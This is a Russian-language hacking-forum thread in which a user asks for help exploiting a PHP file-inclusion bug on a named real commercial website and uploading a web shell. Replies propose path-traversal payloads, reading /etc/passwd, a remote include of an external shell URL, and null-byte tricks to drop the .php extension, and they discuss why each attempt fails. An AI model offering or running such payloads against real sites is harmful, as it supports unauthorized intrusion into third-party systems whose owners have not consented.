(include_path='') Help!

[s3po]

Люди что мне дальше делать если исходить от ?page=ls -la он выдает об ошибке
в /home/comchoic/public_html/index.php
Warning: Failed opening './pages/ls -la.php' for inclusion (include_path='') in /home/comchoic/public_html/index.php on line 35
Вот польный текст что я вижу.
И подскажите как залить туда шелл.

 

[Winux]

?page=ls -la

Команда не выполняется. Он пытается приинклюдить фаил.

/pages/ls -la.php

Поробуй прочитать фаил так:

?page=/../index

Если выведет сорс - ты удачно зашел)

 

[s3po]

Он ко всем запросам добавляет .php'
А по третьему что ты дал выдает только размноженный логотип.

 

[Winux]

Так вот я и говорю погдяди в код пари попробуй. Бывает ничо не отображается а в коде что надо.
Или попробуй посмотреть другой фаил. например найти ect/passwd

 

[n1†R0x]

Или попробуй посмотреть другой фаил. например найти ect/passwd

врядли получится...
он приаттачивает расширение .php к любому файлу
а passwd без расширения..

 

[s3po]

Я уже все испробывал нехрена не получается.
Надо каким нибудь образом залить шелл.

 

[Winux]

На основе того что ты дал ничего не сделать. Надо видеть. Тебе посоветовали что сделать. Шалл так не залить никогда.

 

[s3po]

_http://www.commuterchoice.com/index.php
вот сайт.

 

[durito]

хрен че получиться он инклудит файлы из папки /pages/
потому и вылетает ошибка


Warning: Failed opening './pages/http://zlo.narod.ru/sh.php' for inclusion (include_path='') in /home/comchoic/public_html/index.php on line 35

инклюдить можно только локальные файлы ито с расширением php

 

[Dude03]

А в конце разве нельзя '\0' поставить, че бы расширение отбросить...

 

[durito]

попробовать можно, но все равно иклюдятся файлы только из папки ./pages поэтому внешний инклуд отпадает

 

[gemaglabin]

нет не только из pages
_http://www.commuterchoice.com/index.php?page=../index

 

[durito]

я же говорю внешний инклуд отпадает
внетренний работает, но так как инклудятся файлы только с расширением php то приинклудить .htaccess или /etc/passwd не получиться

 

[not null]

если на сервере включены "магические кавычки", то нуль-байт фильтруется. Но расширение все еще можно попробовать отбросить

 

[Shrek]

Ржал долго:
_http://www.commuterchoice.com/index.php?page=/../index


Нуль баг фильтруется...

Составителю темы: s3po
А ls -la надо писать, когда скрипт юзает переменную, которую потом сунет в passthru(); или system(); :crazy:

void offtop()
{
Кстати, кто меня помнит. Я собираюсь возвращаться в андер =) Все-таки гамы трофируют мозги =)
}

 

[SanyaX]

А приколу что он инклудит файлы. ИСходный код то не выдаёться. Есстевственно это не чего не даст.

 

[Shrek]

Так я про что! Он инклудит их как-то странно. Не сорсы, а уже обработанные php...

 

[n3ff]

...вот если бы было readfile() то другое дело а include так и должен работать.